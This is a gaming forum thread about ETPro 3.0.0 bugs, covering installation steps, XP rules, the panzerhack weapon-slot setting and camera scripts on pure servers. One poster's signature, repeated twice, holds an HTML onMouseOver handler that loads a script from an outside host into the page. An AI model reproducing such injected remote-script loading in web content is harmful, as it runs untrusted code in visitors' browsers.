Known ETPro 3.0.0 bugs

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

blaz

Post by blaz »

download the latest version of etpro here. use winzip and extract (and overwrite) etpro-3_0_0.pk3 to your etdir (or move it to your desktop then paste it into the etpro directory).

once it's in your etpro directory, open etpro-3_0_0.pk3 with winzip and extract (and overwrite) ui_mp_x86.dll and cgame_mp_x86.dll into your etpro directory.

add +set fs_game to your et shortcut's target (ex. "C:\Program Files\ET\ET.exe" +set fs_game etpro). put your demo(s) in etdir\etpro\demos. start et using your shortcut (etpro will be loaded). click on replays; watch your demo.
jorylit

question

Post by jorylit »

should medic hp to be raised while game is paused?
btw, what about ettv? i cant wait...sorry for nagging.
[KuB]FraGiLe

Post by [KuB]FraGiLe »

I noticed that with damage-based xp system u don't get light weapon XP points when u snipe as cov ops....dunno if that'S wanted by the programmers, just wanted to add this here as a maybe-bug :)
mouse

Post by mouse »

blaz wrote:download the latest version of etpro here. use winzip and extract (and overwrite) etpro-3_0_0.pk3 to your etdir (or move it to your desktop then paste it into the etpro directory).
Just tried it and it works this time, thanx a million! :D
bani
Site Admin

Post by bani »

[KuB]FraGiLe wrote:I noticed that with damage-based xp system u don't get light weapon XP points when u snipe as cov ops....dunno if that'S wanted by the programmers, just wanted to add this here as a maybe-bug :)
it's not light weapons XP, it's military-intelligence-and-scoped-weapons XP, same as etmain.
[KuB]FraGiLe

Post by [KuB]FraGiLe »

kk just thought that damaged-based xp would add this to light weapons ...
KingJackaL

Post by KingJackaL »

[KuB]FraGiLe wrote:kk just thought that damaged-based xp would add this to light weapons ...
Damage based XP isn't a mod to LW XP, it's a mod to frags XP - so soliders get damage-based HW XP for HW damage, etc etc
uber-noob

Post by uber-noob »

Is it me, or doesn't the panzerhack work anymore in the latest bugfixes? I set the SMG to slot 2, but it is always in slot 3 (even after a respawn).
Deus

Post by Deus »

works fine for me

remember to have hw l4
uber-noob

Post by uber-noob »

[pH*Deus] wrote:works fine for me

remember to have hw l4
I couldn't choose the SMG as secondary weapon without hw lvl4 ;). I just tried it on my comp running devmap, giving skill up to lvl4 hw and the smg is always in slot3, no matter how I set b_panzerhack (using the ETPro menu doesn't help eighter). This is with bugfix 26. If a demo is needed just say it, it is easy to reproduce here.
Rain

Post by Rain »

A demo wouldn't be helpful for this bug, the special-case for the b_panzerhack is done entirely by the client.

It's possible that you weren't running with the correct client DLL. If you start a map locally, ET can get a bit confused about which pk3 to actually read the DLLs out of when there's more than one.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
uber-noob

Post by uber-noob »

Rain wrote:It's possible that you weren't running with the correct client DLL. If you start a map locally, ET can get a bit confused about which pk3 to actually read the DLLs out of when there's more than one.
My local ETPro folder only contains the latest bugfix pk3. And it doesn't work (at least for me) on the wolfmap et server eighter, which is also running bugfix 26 (this I know for shure because I'm one of it's admins).
Wikkit

Post by Wikkit »

bug or not, here goes:

When issuing the /camera command while not playing a demo, the client can't load the camera if it isn't in the camera folder in etpro-3_0_0.pk3. If the camera script is added to the pk3, it works fine. Just like it works fine to call the camera script when playing a demo, and now the script doesn't have to be in the pk3 to work but rather in its own camera folder under \etpro.
This calls for a rather tiresom process of checking how the script is working, if you have to either play the demo back over and over or have to add the script to the pk3 after each alteration.
-= I'm so hip I'm having difficulties seeing over my pelvis =-<br>
Ex-Galactic President Zaphod Beeblebrox
Rain

Post by Rain »

Wikkit wrote:bug or not, here goes:

When issuing the /camera command while not playing a demo, the client can't load the camera if it isn't in the camera folder in etpro-3_0_0.pk3. If the camera script is added to the pk3, it works fine. Just like it works fine to call the camera script when playing a demo, and now the script doesn't have to be in the pk3 to work but rather in its own camera folder under \etpro.
This calls for a rather tiresom process of checking how the script is working, if you have to either play the demo back over and over or have to add the script to the pk3 after each alteration.
Sounds like you were testing with a pure server... You need to run an unpure server if you want files outside of pk3s to be loadable.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>